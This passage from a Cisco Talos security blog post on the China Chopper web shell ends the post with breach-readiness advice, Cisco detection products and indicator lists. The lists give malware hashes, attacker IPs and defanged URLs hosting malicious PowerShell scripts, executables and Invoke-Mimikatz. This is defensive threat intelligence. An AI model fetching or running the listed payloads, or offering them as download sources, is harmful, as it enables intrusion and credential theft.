is [over 180 day](<https://www.cisco.com/c/m/en_uk/campaigns/breach-readiness-and-response/index.html>)s and implies that defenders should approach building their security teams and processes around an assumption that the organization has already been breached. It is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by the first line security analysts. \n \nWhen securing the infrastructure it is important to keep internal as well as external facing web servers, applications, and frameworks up to date with the latest security patches to mitigate risk of compromise with already known exploits. \n \nDespite the age, China Chopper is here to stay, and we will likely see it in the wild going forward. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n### China Chopper clients\n\n9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a \nc5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef \nb84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07 \n58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc \n \n\n\n### Case study 1\n\n#### Files\n\nb1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader \nfe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy \n28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll \nc9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool \ndbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner \n\n\n#### Legitimate tools\n\nd76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar \n46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar \n96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar \n\n\n#### IP addresses\n\n69.165.64.100 \n59.188.255.184 \n154.211.12.153 \n185.234.218.248 \n\n\n### Case study 2\n\n#### Files\n\n02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader \n1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab \n219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper \n4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the miner \na06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit \n919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy \n\n\n#### URLs\n\nhxxp://101.78.142.74:8001/xavg/javae[.]exe \nhxxp://107.181.160.197/win/3p/checking[.]ps1 \nhxxp://107.182.28.64/t0[.]txt \nhxxp://139.180.199.167:1012/update[.]ps1 \nhxxp://172.96.241.10:80/a \nhxxp://185.228.83.51/config[.]c \nhxxp://188.166.74.218/radm[.]exe \nhxxp://188.166.74.218/untitled[.]exe \nhxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://202.144.193.177/1[.]ps1 \nhxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://is.gd/oeoFuI \nhxxps://pastebin.com/raw/Hd7BmJ33 \nhxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1 \nhxxp://fid.hognoob.se/download[.]exe \nhxxp://107.182.28.64/t0[.]txt \nhxxp://uio.hognoob.se:63145/cfg[.]ini \nhxxp://fid.hognoob.se/HidregSvc[.]exe \nhxxp://188.166.74.218/untitled[.]exe \nhxxp://45.55.211.79/.cache/untitled[.]exe \nhxxp://188.166.74.218/untitled[.]exe \n \n\n\n#### IP Addresses\n\n185.234.218.248 \n \n\n\n### Case study 3\n\n#### Files:\n\nfe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive \n2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062 \nf3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099 \nb46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user \nab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites \n\n\n#### Legitimate Tools:\n\nee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio \nd1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio \n \n", "modified": "2019-08-27T08:14:42", "published": "2019-08-27T08:14:42", "id": "TALOSBLOG:62B868C1729207FF4ED156D86237FD03", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/woKZ9ObRF9g/china-chopper-still-active-9-years-later.html", "type": "talosblog", "title": "China Chopper still active 9 years later", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
